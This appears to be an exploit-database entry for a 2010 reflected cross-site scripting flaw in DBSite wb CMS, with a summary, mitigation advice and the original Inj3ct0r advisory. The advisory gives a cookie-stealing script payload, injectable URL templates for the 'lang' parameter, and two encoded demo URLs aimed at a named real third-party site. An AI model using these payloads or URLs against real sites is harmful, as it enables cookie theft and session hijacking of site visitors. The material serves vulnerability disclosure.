header-logo
Suggest Exploit
vendor:
DBSite wb CMS
by:
The_Exploited
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: DBSite wb CMS
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

DBSite w/b CMS Multiple XSS Vulnerability

DBSite wb CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques in the DBSite wb CMS application. All user-supplied input should be properly validated and encoded to prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39613/info

DBSite wb CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 


=========================================
DBSite w/b CMS Multiple XSS Vulnerability
=========================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /&#039; _ `\ \/\ \/_/_\_<_  /&#039;___\ \ \/\ \ \ \ \/\`&#039;__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                 ###########################################          1
0                 I&#039;m The_Exploited member from Inj3ct0r Team          1
1                 ###########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: The_Exploited

@Title: DBSite w/b CMS Multiple XSS Vulnerability

@Author: The_Exploited aka l3d aka Spoof

@Mail: spoof@live.it

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@Exploit: "><script>alert(document.cookie);</script>

@Demo 1: http://www.mysite.com/dbsite/index.php?page=default&id=1&&lang=[XSS]

@Demo 2: http://www.mysite.com/dbsite/index.php?page=default&id=1&lang=&[PATH]=[XSS]

@Demo online 1: http://www.pratoturismo.it/index.php?page=default&id=8&lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

@Demo online 2: http://www.pratoturismo.it/index.php?page=default&id=16&lang=&comune=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

@CMS Version: All

@CMS Download: http://www.liberologico.com/www/index.php?idx_menu=2&idx_subMenu=0&ID_scheda=31


# Inj3ct0r.com [2010-04-21]